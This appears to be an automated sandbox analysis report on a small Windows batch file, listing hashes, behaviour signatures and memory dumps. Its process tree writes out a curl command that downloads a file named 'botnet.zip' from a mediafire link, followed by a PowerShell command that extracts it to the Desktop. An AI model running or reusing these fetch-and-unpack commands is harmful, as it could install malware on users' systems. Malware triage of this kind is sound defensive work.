Overview

overview

1

Static

static

1

2.bat

windows10-2004-x64

1

Analysis

  • max time kernel
    1752s
  • max time network
    1168s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-08-2023 21:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2.bat

  • Size

    924B

  • MD5

    2c9f11e44033fb6abf20a47ab0f2e968

  • SHA1

    2607d0d420ed80f407b6ecda6f6813607ed3f68a

  • SHA256

    3566a2a6f1789926e34f526d498c48961174ba4036bc6922370c475850b5c350

  • SHA512

    32b167f58391efbc5093662cfb365b1b2de30ad5877c558aa2e915d58a36e9eaa9d207943df451799605f9f5038d332b78ac345a8357ca5006b11a88b15a6290

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4692
    • C:\Windows\system32\curl.exe
      curl -o botnet.zip https://download1478.mediafire.com/dxwb4b6fdd8gNLFtBdDj1s6gJCNXhcoKf0N6kXhydzwCTl19Bnnto35sgormA2pvy6MZckjyfz9oeL3W8mLgCZLChQ-qTJpEtAr1pmFXQAmhqcwpl6OTRIu3OjoGNtuwT4heAn7Yiq80xUa2nRjrYozd0uMJQEJgFmIrKY1AN0tB/co4s63z3n2y5a7f/botney.zip
      2⤵
        PID:888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Expand-Archive -Path 'botnet.zip' -DestinationPath 'C:\Users\Admin\Desktop'"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4140

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rbswvsox.2bu.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/4140-142-0x0000026FDEC90000-0x0000026FDECB2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4140-143-0x00007FFD87D00000-0x00007FFD887C1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4140-144-0x0000026FDD2F0000-0x0000026FDD300000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4140-145-0x0000026FDD2F0000-0x0000026FDD300000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4140-146-0x0000026FF75A0000-0x0000026FF75B2000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4140-147-0x0000026FF7580000-0x0000026FF758A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4140-150-0x00007FFD87D00000-0x00007FFD887C1000-memory.dmp

      Filesize

      10.8MB

      Download